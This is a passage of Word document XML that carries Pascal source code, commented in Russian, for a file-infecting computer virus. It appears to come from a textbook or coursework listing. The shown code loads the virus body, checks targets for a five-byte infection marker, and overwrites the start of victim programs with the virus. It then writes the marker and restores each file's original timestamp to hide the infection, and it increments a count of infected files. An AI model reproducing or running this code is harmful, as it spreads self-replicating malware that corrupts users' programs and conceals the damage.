        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset(VirBody, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Считываем из файла тело вируса в массив VirBuf}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockRead(VirBody VirBuf, VirLen);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Закрываем</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файл</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Close(VirBody); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end;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Поиск</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>жертвы</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procedure FindTarget; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Var</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sr: SearchRec; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(Функция возвращает True, если найденная </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программа уже заражена, и False, если еще нет}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">function VirusPresent: Boolean; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">begin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Пока</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>будем</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>считать</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>что</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вируса</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>нет</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VirusPresent:=False;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Открываем</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>найденный</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файл</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Assign(Target, TargetFile); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset(Target, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Перемещаемся на длину тела вируса от начала файла}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Seek(Target, VirLen); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(Считываем 5 байт - если файл уже заражен,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>там</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>находится</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>метка</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вируса</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BlockRead(Target, Virldentifier, 5); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If Virldentifier=Virl_abel Then </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Если метка есть, значит есть и вирус}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">VirusPresent:=True; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">end;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Процедура</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>заражения</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">procedure InfectFile; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Если размер найденного файла меньше, чем длина вируса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>плюс 100 байт, то выходим из процедуры}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If Sr.Size &lt; VirLen+100 Then Exit; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Если найденная программа еще не заражена, инфицируем ее}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If Not VirusPresent Then</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">begin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Запомним</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>дату</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>время</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>файла</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Атрибуты запоминать не надо,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>так как поиск ведется среди файлов с атрибутом Archive, а этот</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атрибут устанавливается на файл после сохранения в любом случае}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Time:=Sr.Time; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Открываем для заражения}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Assign(Target, TargetFile); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Reset(Target, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Записывам тело вируса в начало файла}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockWrite(Target, VirBuf, VirLen); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Перемещаем указатель текущей позиции</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>на длину вируса от начала файла}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Seek(Target, VirLen); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Вписываем метку заражения}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">BlockWrite(Target, LabelBuf, 5); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Устанавливаем дату и время файла}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">SetFTime(Target, Time);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Закрываем</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Close(Target); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{Увеличиваем счетчик инфицированных файлов}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
